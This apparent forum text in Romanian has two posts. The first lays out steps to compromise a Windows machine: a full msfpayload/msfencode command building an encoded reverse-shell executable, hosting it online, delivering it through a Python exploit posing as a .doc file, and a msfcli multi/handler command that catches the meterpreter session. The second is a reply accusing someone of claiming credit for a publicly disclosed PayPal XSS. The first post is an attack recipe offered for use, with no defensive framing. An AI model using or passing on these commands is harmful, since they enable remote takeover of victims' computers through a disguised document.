1.Creezi payload.exe cu metasploit local msfpayload windows/shell/reverse_tcp LHOST=192.168.206.129 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o /root/Desktop/payload.exe sau folosesti trojan server.exe 2.Urci serverul.exe pe un hosting gratis online 3.Folosesti exploitul in python 4.Daca ai folosit server trojan il chemi cu trojan respectiv 5.Cu metasploit msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.206.129 E O problema este ca tipul care a facut exploitul nu a creat heder corect de la fisierul tip format .doc ca sa fie cit mai exact ca un document.doc Si daca ai fantezie buna poti combina cu mai multe posibilitati
Tu pe cine incerci sa prostesti aici ? Acest xss a fost gasit de un tanar de 17 ani care nu a fost acceptat in programul bug-bounty de la PP. Si probabil s-a ofticat si a postat vulnerabilitatea pe net : Full Disclosure: PayPal.com XSS Vulnerability . Iar tu, ca un bun xerox l-ai luat si ti-ai acordat credite. Lasa-te(ne) !